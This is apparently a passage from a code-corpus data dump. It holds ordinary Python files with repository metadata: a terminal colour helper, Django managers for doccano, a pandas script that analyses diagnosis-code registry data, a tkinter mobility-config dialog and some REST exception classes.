            getattr(colors, key)
            setattr(colors, key, value)
# vim:ts=4 sts=4 sw=4 et
| 28.864583 | 96 | 0.674125 |
import functools
import re
class _dummy_curses:
@staticmethod
def tigetstr(*args, **kwargs):
del args, kwargs
return b''
@staticmethod
def tparm(*args, **kwargs):
del args, kwargs
return b''
_curses = _dummy_curses
class colors:
black = NotImplemented
red = NotImplemented
green = NotImplemented
yellow = NotImplemented
blue = NotImplemented
magenta = NotImplemented
cyan = NotImplemented
white = NotImplemented
_strip_delay = functools.partial(
re.compile(b'[$]<([0-9]*[.])?[0-9]+([/*]|[*][/])?>').sub,
b''
)
def attr_fg(i):
s = _curses.tigetstr('setaf') or b''
s = _strip_delay(s)
if s:
s = _curses.tparm(s, i)
return s.decode()
def attr_reset():
s = _curses.tigetstr('sgr0') or b''
s = _strip_delay(s)
return s.decode()
def initialize():
global _curses
try:
import curses as _curses
except ImportError:
return
try:
_curses.setupterm()
except _curses.error:
_curses = _dummy_curses
return
for key, value in vars(_curses).items():
if key.startswith('COLOR_'):
key = key[6:].lower()
getattr(colors, key)
setattr(colors, key, value)
| true | true |
f7192a92add38302ca93b33ef7669bbdd2fd3d64 | 1,534 | py | Python | backend/examples/managers.py | daobook/doccano | 45122687740f74f19e2578c5cf28507f0839bf16 | [
"MIT"
] | 2 | 2021-12-11T22:25:27.000Z | 2021-12-20T01:02:16.000Z | backend/examples/managers.py | daobook/doccano | 45122687740f74f19e2578c5cf28507f0839bf16 | [
"MIT"
] | 1 | 2022-02-15T10:50:18.000Z | 2022-02-15T10:50:18.000Z | backend/examples/managers.py | daobook/doccano | 45122687740f74f19e2578c5cf28507f0839bf16 | [
"MIT"
] | null | null | null | from django.db.models import Count, Manager
class ExampleManager(Manager):
    def bulk_create(self, objs, batch_size=None, ignore_conflicts=False):
        """Bulk-insert examples, then re-fetch them by uuid in input order.

        NOTE(review): if ignore_conflicts drops rows, the uuid lookup below
        raises KeyError for the skipped objects — confirm callers never pass
        conflicting uuids with ignore_conflicts=True.
        """
        super().bulk_create(objs, batch_size=batch_size, ignore_conflicts=ignore_conflicts)
        uuids = [data.uuid for data in objs]
        examples = self.in_bulk(uuids, field_name='uuid')
        return [examples[uid] for uid in uuids]
class ExampleStateManager(Manager):
    def count_done(self, examples, user=None):
        """Count distinct confirmed examples, optionally for a single user."""
        if user:
            queryset = self.filter(example_id__in=examples, confirmed_by=user)
        else:
            queryset = self.filter(example_id__in=examples)
        return queryset.distinct().values('example').count()
    def measure_member_progress(self, examples, members):
        """Return per-member confirmation counts over *examples*.

        Members with no confirmed example are included with done=0.
        """
        done_count = self.filter(example_id__in=examples)\
            .values('confirmed_by__username')\
            .annotate(total=Count('confirmed_by'))
        response = {
            'total': examples.count(),
            'progress': [
                {
                    'user': obj['confirmed_by__username'],
                    'done': obj['total']
                } for obj in done_count
            ]
        }
        # Pad out members that have not confirmed anything yet.
        members_with_progress = {o['confirmed_by__username'] for o in done_count}
        for member in members:
            if member.username not in members_with_progress:
                response['progress'].append({
                    'user': member.username,
                    'done': 0
                })
        return response
| 35.674419 | 91 | 0.594524 | from django.db.models import Count, Manager
class ExampleManager(Manager):
def bulk_create(self, objs, batch_size=None, ignore_conflicts=False):
super().bulk_create(objs, batch_size=batch_size, ignore_conflicts=ignore_conflicts)
uuids = [data.uuid for data in objs]
examples = self.in_bulk(uuids, field_name='uuid')
return [examples[uid] for uid in uuids]
class ExampleStateManager(Manager):
def count_done(self, examples, user=None):
if user:
queryset = self.filter(example_id__in=examples, confirmed_by=user)
else:
queryset = self.filter(example_id__in=examples)
return queryset.distinct().values('example').count()
def measure_member_progress(self, examples, members):
done_count = self.filter(example_id__in=examples)\
.values('confirmed_by__username')\
.annotate(total=Count('confirmed_by'))
response = {
'total': examples.count(),
'progress': [
{
'user': obj['confirmed_by__username'],
'done': obj['total']
} for obj in done_count
]
}
members_with_progress = {o['confirmed_by__username'] for o in done_count}
for member in members:
if member.username not in members_with_progress:
response['progress'].append({
'user': member.username,
'done': 0
})
return response
| true | true |
f7192c7b1ed57d054d205ebd4ca697e7e2c4e65c | 10,095 | py | Python | datapreparation/analyze.py | Anders-Holst/Bonsai | 841aa4e12c8bea8945396bd232c2006260127507 | [
"MIT"
] | null | null | null | datapreparation/analyze.py | Anders-Holst/Bonsai | 841aa4e12c8bea8945396bd232c2006260127507 | [
"MIT"
] | null | null | null | datapreparation/analyze.py | Anders-Holst/Bonsai | 841aa4e12c8bea8945396bd232c2006260127507 | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
""" -------------------------------
analyse.py
Copyright (C) 2018 RISE
This code was produced by RISE
The 2013-04-10 version
bonsai/src_v02/analyze.py
simple analysis of pandas dataframes data
such as
1. find duplicated rows
2. number of unique values in a column
3. number of unique values in common
between two columns in two different
files
4.
------------------------------------"""
import global_settings as gs
import numpy as np
import pandas as pd
import bonsai_io as bio
import common
import copy
def nr_of_unique_rows(df):
    """Number of distinct rows in *df*."""
    return len(df.drop_duplicates())
def nr_of_unique_values_in_cols(df, cols):
    """Number of distinct value combinations over the columns *cols*."""
    return len(df.drop_duplicates(subset=cols))
def nr_of_unique_values(df, col):
    """Number of distinct non-null values in column *col*."""
    return df[col].dropna().nunique()
"""
def nr_of_unique_numeric_values(df, col):
c = df[col].dropna()
c = c.drop_duplicates()
c = c.str.isnumeric()
c = c[c].index.values
"""
def nr_of_nonnan_values(df, col):
    """Number of non-null entries in column *col*."""
    return int(df[col].notna().sum())
def nr_of_unique_digital_values(df, col):
    """Number of distinct non-null values in *col* made up entirely of digits."""
    values = df[col].dropna().drop_duplicates()
    digit_mask = values.str.isdigit()
    return len(digit_mask[digit_mask].index.values)
def duplicated_rows(df):
    """Return the rows of *df* that duplicate an earlier row.

    The returned frame carries the boolean 'dup' marker column as before,
    but the input is copied first: the original code added the 'dup' column
    to the caller's DataFrame as a side effect.
    """
    marked = df.copy()
    marked['dup'] = marked.duplicated()
    return marked[marked['dup'] == True]
def print_duplicated_rows(df, nr):
    """Print a short duplicate-row report and return the duplicated rows."""
    dup = duplicated_rows(df)
    print('Nr of rows in total', len(df))
    print('Nr of duplicated rows', len(dup))
    head = min(nr, len(dup))
    if head > 0:
        print('the first', head, ' of them')
        print(dup[0:head])
    return dup
def unique_number_values(df, col):
    """Rows (first occurrence per *col* value) whose *col* contains a digit."""
    deduped = df.drop_duplicates(subset=col)
    return deduped[deduped[col].str.contains(r'\d', regex=True)]
def info(df, name = ''):
    """Print shape/uniqueness statistics for *df* and each of its columns."""
    print()
    if name != '':
        print()
        print('--------------------------------------------------')
        print()
        print('\tInfo on the file\n\t' + name)
        print()
        print('--------------------------------------------------')
        print()
    df_unique_nr = nr_of_unique_rows(df)
    print('   shape', df.shape)
    print('   unique rows', df_unique_nr)
    for c in df.columns:
        print()
        print('\tInfo on non-nan values of column', c)
        print()
        nonnan_nr  = nr_of_nonnan_values(df, c)
        unique_nr  = nr_of_unique_values(df, c)
        digital_nr = nr_of_unique_digital_values(df, c)
        # numeric_nr = nr_of_unique_numeric_values(df, c)
        print('non-nan values', nonnan_nr)
        print(' unique values', unique_nr)
        print('digital values', digital_nr)
        # print('numeric values', unique_nr)
        print()
# return unique_number_values(df, 'ICD10')
# df = df[ df[c].str.contains('\d', regex=True) ]
def readall():
    """Load every dataset via bonsai_io; return (frames, padded labels).

    The label strings are space-padded for aligned console output.
    """
    dia = bio.read_generated_dia()
    dgr = bio.read_diagroups()
    per = bio.readperson()
    ctr = bio.readcontrol()
    inc = bio.readincare()
    nic = bio.readnicare()
    dru = bio.readdrug()
    dcl = bio.readdrugclasses()
    tre = bio.readtreatment()
    sur = bio.readsurgery()
    cau = bio.readcause()
    data = [
        dia,
        dgr,
        per,
        ctr,
        inc,
        nic,
        dru,
        dcl,
        tre,
        sur,
        cau
    ]
    name = [
        'diagnos          ',
        'diagnosgrupp     ',
        'person           ',
        'kontrollgrupp    ',
        'sluten v_rd      ',
        '_ppen v_rd       ',
        'l_kemedel        ',
        'l_kemedelsgrupper',
        'behandling       ',
        'kirurgi          ',
        'orsak            ',
    ]
    return data, name
def info_on_all():
    """Print info() for every dataset returned by readall()."""
    data, name = readall()
    for frame, label in zip(data, name):
        info(frame, label)
def compare_lopnr(dfx, dfy, namex = 'data 1', namey = 'data 2'):
    """Compare the LopNr columns of two frames and print overlap statistics.

    Returns (ux, uy): sorted lists of LopNr values that appear only in dfx
    and only in dfy, respectively.
    """
    sx = set(dfx['LopNr'].values)
    sy = set(dfy['LopNr'].values)
    cut = sx & sy
    # Bug fix: the original ended with `ux.sort` / `uy.sort` (missing call
    # parentheses) — a no-op, so the lists came back unsorted.
    ux = sorted(sx - sy)
    uy = sorted(sy - sx)
    print()
    print('common Lopnr\t\t\t', len(cut))
    print('Lopnr in ' + namex + ' only\t', len(ux))
    print('Lopnr in ' + namey + ' only\t', len(uy))
    print()
    return ux, uy
def readlopnr():
    """Load the registry tables that carry a LopNr column, plus labels.

    Returns:
        (data, name): parallel lists of DataFrames and fixed-width labels.
    """
    readers = [
        (bio.read_generated_dia, 'diagnos      '),
        (bio.readperson,         'person       '),
        (bio.readcontrol,        'kontrollgrupp'),
        (bio.readincare,         'sluten v_rd  '),
        (bio.readnicare,         '_ppen v_rd   '),
        (bio.readdrug,           'l_kemedel    '),
        (bio.readtreatment,      'behandling   '),
        (bio.readsurgery,        'kirurgi      '),
        (bio.readcause,          'orsak        '),
    ]
    data = [read() for read, _ in readers]
    name = [label for _, label in readers]
    return data, name
def pairwise_lopnr_comparisions():
    """Run compare_lopnr on every unordered pair of LopNr-bearing tables."""
    data, name = readlopnr()
    rule = '--------------------------------------------------'
    n = len(name)
    for i in range(n):
        for j in range(i + 1, n):
            print()
            print(rule)
            print()
            print('\tComparing ' + name[i] + ' with ' + name[j])
            print()
            print(rule)
            print()
            compare_lopnr(data[i], data[j], name[i], name[j])
""" -------------------------------
4. count amd list various types of diagnosis
codes in care data
------------------------------------"""
"""
def is_icd10_class(x):
if not common.isstr(x):
return False
if common.is_icd10(x):
return False
if len(x) < 3:
return False
if not x[0].isupper():
return False
return x[1].isdigit() and x[2].isdigit()
"""
def code_count(xs):
    """Number of whitespace-separated codes in *xs*; 0 for non-strings (NaN)."""
    if not isinstance(xs, str):
        return 0
    return sum(1 for _ in xs.split())
def icd10_count(xs):
    """Count the codes in *xs* that parse as proper ICD-10 codes.

    Non-string input (e.g. NaN cells) counts as zero codes.
    """
    if not isinstance(xs, str):
        return 0
    return sum(1 for code in xs.split() if common.is_icd10(code))
def not_icd10_count(xs):
    """Count the codes in *xs* that do NOT parse as proper ICD-10 codes.

    Non-string input (e.g. NaN cells) counts as zero codes.
    """
    if not isinstance(xs, str):
        return 0
    return sum(1 for code in xs.split() if not common.is_icd10(code))
def icd10_class_count(xs):
    """Count the codes in *xs* that are ICD-10 class codes.

    Non-string input (e.g. NaN cells) counts as zero codes.
    """
    if not isinstance(xs, str):
        return 0
    return sum(1 for code in xs.split() if common.is_icd10_class(code))
"""
def code_list(xs):
if not isinstance(xs, str):
return 0
return len(xs.split())
"""
def count_and_print(df, table = False):
    """Sum the per-row code counts over df['DIAGNOS'] and print a report.

    table=True prints tab-separated labels; otherwise padded/aligned labels.
    Works on a shallow copy, so *df* itself gains no helper columns.
    """
    dia = 'DIAGNOS'
    dfc = copy.copy(df)
    # One helper column per counter; .sum() then yields the file-wide totals.
    dfc['code_count'] = df[dia].apply(code_count)
    dfc['icd10_count'] = df[dia].apply(icd10_count)
    dfc['not_icd10_count'] = df[dia].apply(not_icd10_count)
    dfc['icd10_class_count'] = df[dia].apply(icd10_class_count)
    nr_of_codes = dfc['code_count'].sum()
    nr_of_icd10 = dfc['icd10_count'].sum()
    nr_of_not_icd10 = dfc['not_icd10_count'].sum()
    nr_of_class_codes = dfc['icd10_class_count'].sum()
    if table:
        print('nr_of_lines\t', len(df))
        print('nr_of_codes\t', nr_of_codes)
        print('nr_of_icd10\t', nr_of_icd10)
        print('nr_of_not_icd10\t', nr_of_not_icd10)
        print('nr_of_icd10_class_codes\t', nr_of_class_codes)
    else:
        # Labels right-aligned to the width of the longest one.
        print('            nr_of_lines', len(df))
        print('            nr_of_codes', nr_of_codes)
        print('            nr_of_icd10', nr_of_icd10)
        print('        nr_of_not_icd10', nr_of_not_icd10)
        print('nr_of_icd10_class_codes', nr_of_class_codes)
"""
for c in df1[dia].values:
print('\t', c)
"""
def print_dates(df, table = False):
    """Print the earliest and latest INDATUM value in *df*.

    table=True uses tab-separated labels, otherwise aligned labels.
    """
    date = 'INDATUM'
    first = df[date].min()
    last = df[date].max()
    if table:
        print('first date\t', first)
        print('last date\t', last)
    else:
        print('    first date', first)
        print('     last date', last)
def icd10_class_list(xs):
    """Return the ICD-10 class codes found in *xs* (empty list for NaN)."""
    if not isinstance(xs, str):
        return []
    return [code for code in xs.split() if common.is_icd10_class(code)]
def flat(xs):
    """Flatten one level: concatenate the sub-lists of *xs* into one list."""
    out = []
    for sub in xs:
        out.extend(sub)
    return out
def print_class_codes(df):
    """Print the sorted unique ICD-10 class codes found in df['DIAGNOS']."""
    per_row = df['DIAGNOS'].apply(icd10_class_list)
    # Keep only rows that actually contained at least one class code.
    nonempty = per_row[per_row.apply(lambda codes: codes != [])]
    for code in np.unique(flat(list(nonempty.values))):
        print('\t', code)
def diagnosis_code_count(df, print_class = False, table = False):
    """Report diagnosis-code statistics before and after the ICD-10 cutover.

    Parses INDATUM, drops unparseable rows, splits the data at 1998-01-01
    (when ICD-10 reporting starts) and prints date range plus code counts
    for each half.  print_class additionally lists the ICD-10 class codes
    seen after the cutover; table switches to tab-separated output.

    NOTE: mutates the caller's frame (INDATUM is converted in place).
    """
    date = 'INDATUM'
    nr = 'LopNr'
    icd10_start = np.datetime64('1998-01-01')
    # Disabled code kept from the original (reported empty-line counts):
    """
    size0 = len(df)
    df = df.dropna().reset_index(drop=True)
    print('nr of empty lines:', size0- len(df))
    """
    df[date] = df[date].apply(bio.str2time)
    df = df.sort_values(date).dropna().reset_index(drop=True)
    # Split at the ICD-10 introduction date.
    df1 = df[df[date] < icd10_start]
    df2 = df[df[date] >= icd10_start]
    print()
    print('code counts before 1998_01_01:')
    print()
    print_dates(df1, table = table)
    count_and_print(df1, table = table)
    print()
    print('code counts from 1998_01_01')
    print()
    print_dates(df2, table = table)
    count_and_print(df2, table = table)
    if print_class:
        print()
        print(' all icd10_class_codes:')
        print_class_codes(df2)
        print()
| 22.995444 | 71 | 0.525706 |
import global_settings as gs
import numpy as np
import pandas as pd
import bonsai_io as bio
import common
import copy
def nr_of_unique_rows(df):
    """Number of distinct rows in *df*."""
    return len(df.drop_duplicates())
def nr_of_unique_values_in_cols(df, cols):
    """Number of distinct value combinations over the given columns."""
    return len(df.drop_duplicates(subset=cols))
def nr_of_unique_values(df, col):
    """Number of distinct non-NaN values in column *col*."""
    return len(df[col].dropna().drop_duplicates())
def nr_of_nonnan_values(df, col):
    """Number of non-NaN entries in column *col*."""
    return len(df[col].dropna())
def nr_of_unique_digital_values(df, col):
    """Number of distinct non-NaN values in *col* made up solely of digits.

    Assumes the column holds strings (uses the pandas .str accessor).
    """
    uniq = df[col].dropna().drop_duplicates()
    return int(uniq.str.isdigit().sum())
def duplicated_rows(df):
    """Return the rows of *df* that duplicate an earlier row.

    NOTE: mutates the caller's frame by adding a boolean 'dup' column
    (kept for backward compatibility with existing callers).
    """
    df['dup'] = df.duplicated()
    # Idiomatic boolean indexing instead of comparing `== True`.
    return df[df['dup']]
def print_duplicated_rows(df, nr):
    """Report duplicate rows, print up to *nr* of them, and return them."""
    dup = duplicated_rows(df)
    print('Nr of rows in total', len(df))
    print('Nr of duplicated rows', len(dup))
    to_show = min(nr, len(dup))
    if to_show > 0:
        print('the first', to_show, ' of them')
        print(dup[0:to_show])
    return dup
def unique_number_values(df, col):
    """Rows with a distinct *col* value that contains at least one digit.

    Duplicate values keep their first occurrence (drop_duplicates default).
    """
    df = df.drop_duplicates(subset=col)
    # r'\d': raw string avoids the invalid-escape-sequence DeprecationWarning
    # that the original non-raw '\d' triggers on modern Python.
    return df[df[col].str.contains(r'\d', regex=True)]
def info(df, name = ''):
    """Print a structural summary of *df*: shape, unique-row count, and
    per-column non-NaN / unique / all-digit value counts.

    Args:
        df: DataFrame to summarise.
        name: optional file label; when given, a banner is printed first.
    """
    print()
    if name != '':
        # Banner identifying which file is being summarised.
        print()
        print('--------------------------------------------------')
        print()
        print('\tInfo on the file\n\t' + name)
        print()
        print('--------------------------------------------------')
        print()
    df_unique_nr = nr_of_unique_rows(df)
    print('   shape', df.shape)
    print('   unique rows', df_unique_nr)
    for c in df.columns:
        # Column-level statistics over the non-NaN entries.
        print()
        print('\tInfo on non-nan values of column', c)
        print()
        nonnan_nr = nr_of_nonnan_values(df, c)
        unique_nr = nr_of_unique_values(df, c)
        digital_nr = nr_of_unique_digital_values(df, c)
        print('non-nan values', nonnan_nr)
        print(' unique values', unique_nr)
        print('digital values', digital_nr)
        print()
def readall():
dia = bio.read_generated_dia()
dgr = bio.read_diagroups()
per = bio.readperson()
ctr = bio.readcontrol()
inc = bio.readincare()
nic = bio.readnicare()
dru = bio.readdrug()
dcl = bio.readdrugclasses()
tre = bio.readtreatment()
sur = bio.readsurgery()
cau = bio.readcause()
data = [
dia,
dgr,
per,
ctr,
inc,
nic,
dru,
dcl,
tre,
sur,
cau
]
name = [
'diagnos ',
'diagnosgrupp ',
'person ',
'kontrollgrupp ',
'sluten v_rd ',
'_ppen v_rd ',
'l_kemedel ',
'l_kemedelsgrupper',
'behandling ',
'kirurgi ',
'orsak ',
]
return data, name
def info_on_all():
data, name = readall()
for i in range(0, len(name)):
info(data[i], name[i])
def compare_lopnr(dfx, dfy, namex = 'data 1', namey = 'data 2'):
    """Compare the LopNr (person id) columns of two tables.

    Prints the size of the overlap and of each side's exclusive id sets,
    then returns the exclusive ids as sorted lists.

    Args:
        dfx, dfy: DataFrames that each have a 'LopNr' column.
        namex, namey: labels used in the printed report.

    Returns:
        (ux, uy): sorted lists of LopNr present only in dfx / only in dfy.
    """
    sx = set(dfx['LopNr'].values)
    sy = set(dfy['LopNr'].values)
    cut = sx & sy
    # BUG FIX: the original ended with `ux.sort` / `uy.sort` (missing call
    # parentheses), so the returned lists were never actually sorted.
    ux = sorted(sx - sy)
    uy = sorted(sy - sx)
    print()
    print('common Lopnr\t\t\t', len(cut))
    print('Lopnr in ' + namex + ' only\t', len(ux))
    print('Lopnr in ' + namey + ' only\t', len(uy))
    print()
    return ux, uy
def readlopnr():
dia = bio.read_generated_dia()
per = bio.readperson()
ctr = bio.readcontrol()
inc = bio.readincare()
nic = bio.readnicare()
dru = bio.readdrug()
tre = bio.readtreatment()
sur = bio.readsurgery()
cau = bio.readcause()
data = [dia, per, ctr, inc, nic, dru, tre, sur, cau]
name = [
'diagnos ',
'person ',
'kontrollgrupp',
'sluten v_rd ',
'_ppen v_rd ',
'l_kemedel ',
'behandling ',
'kirurgi ',
'orsak ',
]
return data, name
def pairwise_lopnr_comparisions():
data, name = readlopnr()
for i in range(0, len(name)):
for j in range(i+1, len(name)):
print()
print('--------------------------------------------------')
print()
print('\tComparing ' + name[i] + ' with ' + name[j])
print()
print('--------------------------------------------------')
print()
compare_lopnr(data[i], data[j], name[i], name[j])
def code_count(xs):
if not isinstance(xs, str):
return 0
return len(xs.split())
def icd10_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if common.is_icd10(x):
count += 1
return count
def not_icd10_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if not common.is_icd10(x):
count += 1
return count
def icd10_class_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if common.is_icd10_class(x):
count += 1
return count
def count_and_print(df, table = False):
dia = 'DIAGNOS'
dfc = copy.copy(df)
dfc['code_count'] = df[dia].apply(code_count)
dfc['icd10_count'] = df[dia].apply(icd10_count)
dfc['not_icd10_count'] = df[dia].apply(not_icd10_count)
dfc['icd10_class_count'] = df[dia].apply(icd10_class_count)
nr_of_codes = dfc['code_count'].sum()
nr_of_icd10 = dfc['icd10_count'].sum()
nr_of_not_icd10 = dfc['not_icd10_count'].sum()
nr_of_class_codes = dfc['icd10_class_count'].sum()
if table:
print('nr_of_lines\t', len(df))
print('nr_of_codes\t', nr_of_codes)
print('nr_of_icd10\t', nr_of_icd10)
print('nr_of_not_icd10\t', nr_of_not_icd10)
print('nr_of_icd10_class_codes\t', nr_of_class_codes)
else:
print(' nr_of_lines', len(df))
print(' nr_of_codes', nr_of_codes)
print(' nr_of_icd10', nr_of_icd10)
print(' nr_of_not_icd10', nr_of_not_icd10)
print(' nr_of_icd10_class_codes', nr_of_class_codes)
def print_dates(df, table = False):
date = 'INDATUM'
if table:
print('first date\t', df[date].min())
print('last date\t', df[date].max())
else:
print(' first date', df[date].min())
print(' last date', df[date].max())
def icd10_class_list(xs):
if not isinstance(xs, str):
return []
codes = []
for x in xs.split():
if common.is_icd10_class(x):
codes += [x]
return codes
def flat(xs):
ys = []
for x in xs:
ys += x
return ys
def print_class_codes(df):
dia = 'DIAGNOS'
dfc = copy.copy(df)
dfc['icd10_class'] = df[dia].apply(icd10_class_list)
dfc['is_class'] = dfc['icd10_class'].apply(lambda x: x != [])
dfc = dfc[dfc['is_class']]
codes = np.unique(flat(list(dfc['icd10_class'].values)))
for c in codes:
print('\t', c)
def diagnosis_code_count(df, print_class = False, table = False):
date = 'INDATUM'
nr = 'LopNr'
icd10_start = np.datetime64('1998-01-01')
df[date] = df[date].apply(bio.str2time)
df = df.sort_values(date).dropna().reset_index(drop=True)
df1 = df[df[date] < icd10_start]
df2 = df[df[date] >= icd10_start]
print()
print('code counts before 1998_01_01:')
print()
print_dates(df1, table = table)
count_and_print(df1, table = table)
print()
print('code counts from 1998_01_01')
print()
print_dates(df2, table = table)
count_and_print(df2, table = table)
if print_class:
print()
print(' all icd10_class_codes:')
print_class_codes(df2)
print()
| true | true |
f7192ca4418b9d3bb4703a309575a6c835793c29 | 2,000 | py | Python | daemon/core/gui/dialogs/mobilityconfig.py | montag451/core | 3be162b0b0f54b35520b980023abdfad4ff5e489 | [
"BSD-2-Clause"
] | null | null | null | daemon/core/gui/dialogs/mobilityconfig.py | montag451/core | 3be162b0b0f54b35520b980023abdfad4ff5e489 | [
"BSD-2-Clause"
] | null | null | null | daemon/core/gui/dialogs/mobilityconfig.py | montag451/core | 3be162b0b0f54b35520b980023abdfad4ff5e489 | [
"BSD-2-Clause"
] | null | null | null | """
mobility configuration
"""
from tkinter import ttk
from typing import TYPE_CHECKING
import grpc
from core.gui.dialogs.dialog import Dialog
from core.gui.errors import show_grpc_error
from core.gui.themes import PADX, PADY
from core.gui.widgets import ConfigFrame
if TYPE_CHECKING:
from core.gui.app import Application
from core.gui.graph.node import CanvasNode
class MobilityConfigDialog(Dialog):
    """Modal dialog for viewing and editing a node's mobility configuration."""
    def __init__(
        self, master: "Application", app: "Application", canvas_node: "CanvasNode"
    ):
        """Create the dialog and load the node's current mobility config.

        If the gRPC fetch fails, the error is shown to the user and the
        dialog destroys itself immediately (has_error stays True so the
        caller can detect the failure).
        """
        super().__init__(
            master,
            app,
            f"{canvas_node.core_node.name} Mobility Configuration",
            modal=True,
        )
        self.canvas_node = canvas_node
        self.node = canvas_node.core_node
        self.config_frame = None
        self.has_error = False
        try:
            self.config = self.app.core.get_mobility_config(self.node.id)
            self.draw()
        except grpc.RpcError as e:
            self.has_error = True
            show_grpc_error(e, self.app, self.app)
            self.destroy()
    def draw(self):
        """Lay out the config editor frame and the apply/cancel button row."""
        self.top.columnconfigure(0, weight=1)
        self.top.rowconfigure(0, weight=1)
        self.config_frame = ConfigFrame(self.top, self.app, self.config)
        self.config_frame.draw_config()
        self.config_frame.grid(sticky="nsew", pady=PADY)
        self.draw_apply_buttons()
    def draw_apply_buttons(self):
        """Create equally sized Apply and Cancel buttons in one row."""
        frame = ttk.Frame(self.top)
        frame.grid(sticky="ew")
        for i in range(2):
            frame.columnconfigure(i, weight=1)
        button = ttk.Button(frame, text="Apply", command=self.click_apply)
        button.grid(row=0, column=0, padx=PADX, sticky="ew")
        button = ttk.Button(frame, text="Cancel", command=self.destroy)
        button.grid(row=0, column=1, sticky="ew")
    def click_apply(self):
        """Parse the edited values, store them on the core client, and close."""
        self.config_frame.parse_config()
        self.app.core.mobility_configs[self.node.id] = self.config
        self.destroy()
| 30.769231 | 82 | 0.643 | from tkinter import ttk
from typing import TYPE_CHECKING
import grpc
from core.gui.dialogs.dialog import Dialog
from core.gui.errors import show_grpc_error
from core.gui.themes import PADX, PADY
from core.gui.widgets import ConfigFrame
if TYPE_CHECKING:
from core.gui.app import Application
from core.gui.graph.node import CanvasNode
class MobilityConfigDialog(Dialog):
def __init__(
self, master: "Application", app: "Application", canvas_node: "CanvasNode"
):
super().__init__(
master,
app,
f"{canvas_node.core_node.name} Mobility Configuration",
modal=True,
)
self.canvas_node = canvas_node
self.node = canvas_node.core_node
self.config_frame = None
self.has_error = False
try:
self.config = self.app.core.get_mobility_config(self.node.id)
self.draw()
except grpc.RpcError as e:
self.has_error = True
show_grpc_error(e, self.app, self.app)
self.destroy()
def draw(self):
self.top.columnconfigure(0, weight=1)
self.top.rowconfigure(0, weight=1)
self.config_frame = ConfigFrame(self.top, self.app, self.config)
self.config_frame.draw_config()
self.config_frame.grid(sticky="nsew", pady=PADY)
self.draw_apply_buttons()
def draw_apply_buttons(self):
frame = ttk.Frame(self.top)
frame.grid(sticky="ew")
for i in range(2):
frame.columnconfigure(i, weight=1)
button = ttk.Button(frame, text="Apply", command=self.click_apply)
button.grid(row=0, column=0, padx=PADX, sticky="ew")
button = ttk.Button(frame, text="Cancel", command=self.destroy)
button.grid(row=0, column=1, sticky="ew")
def click_apply(self):
self.config_frame.parse_config()
self.app.core.mobility_configs[self.node.id] = self.config
self.destroy()
| true | true |
f7192d36362e57de19098cfbb44d604a21beea70 | 27 | py | Python | src/user/__init__.py | aleksandrgordienko/melissa-quiz | 49b165acc9aae0ad84cf751cbeb4f6a27dd5ab0f | [
"MIT"
] | null | null | null | src/user/__init__.py | aleksandrgordienko/melissa-quiz | 49b165acc9aae0ad84cf751cbeb4f6a27dd5ab0f | [
"MIT"
] | null | null | null | src/user/__init__.py | aleksandrgordienko/melissa-quiz | 49b165acc9aae0ad84cf751cbeb4f6a27dd5ab0f | [
"MIT"
] | null | null | null | from user.user import User
| 13.5 | 26 | 0.814815 | from user.user import User
| true | true |
f7192d364390595ddfd11a6ee7c5d20a2c7dadff | 759 | py | Python | revibe/_errors/accounts.py | Revibe-Music/core-services | 6b11cf16ad2c35d948f3a5c0e7a161e5b7cfc1b2 | [
"MIT"
] | 2 | 2022-01-24T23:30:18.000Z | 2022-01-26T00:21:22.000Z | revibe/_errors/accounts.py | Revibe-Music/core-services | 6b11cf16ad2c35d948f3a5c0e7a161e5b7cfc1b2 | [
"MIT"
] | null | null | null | revibe/_errors/accounts.py | Revibe-Music/core-services | 6b11cf16ad2c35d948f3a5c0e7a161e5b7cfc1b2 | [
"MIT"
] | null | null | null | from rest_framework.exceptions import APIException
from revibe._errors import network
from revibe._helpers import status
# -----------------------------------------------------------------------------
class AccountError(APIException):
    """Generic account-related failure reported as an HTTP 409 conflict."""
    status_code = status.HTTP_409_CONFLICT
    default_detail = "The request could not be completed, please try again"
    default_code = 'conflict'
class AccountNotFound(network.UnauthorizedError):
    """Raised when the current user cannot be identified; status/code come
    from the network.UnauthorizedError base class."""
    default_detail = "Could not identify the current user, please try again"
class NotArtistError(network.ForbiddenError):
    """Raised when the current artist cannot be identified; status/code come
    from the network.ForbiddenError base class."""
    default_detail = "Could not identify the current artist"
class ProfileNotFoundError(network.ExpectationFailedError):
    """Raised when the user's profile information is missing; status/code
    come from the network.ExpectationFailedError base class."""
    default_detail = "The user's profile information could not be found"
| 33 | 79 | 0.715415 | from rest_framework.exceptions import APIException
from revibe._errors import network
from revibe._helpers import status
class AccountError(APIException):
status_code = status.HTTP_409_CONFLICT
default_detail = "The request could not be completed, please try again"
default_code = 'conflict'
class AccountNotFound(network.UnauthorizedError):
default_detail = "Could not identify the current user, please try again"
class NotArtistError(network.ForbiddenError):
default_detail = "Could not identify the current artist"
class ProfileNotFoundError(network.ExpectationFailedError):
default_detail = "The user's profile information could not be found"
| true | true |
f7192ecde00bc5320bdb6678d1b0c377180f6a7d | 59 | py | Python | resources/resources/enow/jython/pythonSrc/__init__.py | ENOW-IJI/ENOW-server | 1398d5a9d037efcee2886f6c7393b5e396ab0c18 | [
"Apache-2.0"
] | 3 | 2016-08-12T14:46:53.000Z | 2016-08-13T02:54:58.000Z | resources/resources/enow/jython/pythonSrc/__init__.py | ENOW-IJI/ENOW-server | 1398d5a9d037efcee2886f6c7393b5e396ab0c18 | [
"Apache-2.0"
] | 1 | 2016-08-30T15:58:19.000Z | 2016-08-30T15:58:19.000Z | python/enow/jython/pythonSrc/__init__.py | ENOW-IJI/api | 415fc69fc8f1ad25f1619aca0fa932f92e8b9d09 | [
"Apache-2.0"
] | null | null | null | __all__ = ["preCode", "body", "postCode", "StreamToLogger"] | 59 | 59 | 0.677966 | __all__ = ["preCode", "body", "postCode", "StreamToLogger"] | true | true |
f7192f1a1cfbc76f583f0c727d070157e0eb514b | 542 | py | Python | manage.py | preet4737/College-Event-Manager | c8da687adeaa4f7f16d717a554e0e7af609fd305 | [
"MIT"
] | 3 | 2019-12-20T05:51:48.000Z | 2020-02-01T20:56:39.000Z | manage.py | preet4737/College-Event-Manager | c8da687adeaa4f7f16d717a554e0e7af609fd305 | [
"MIT"
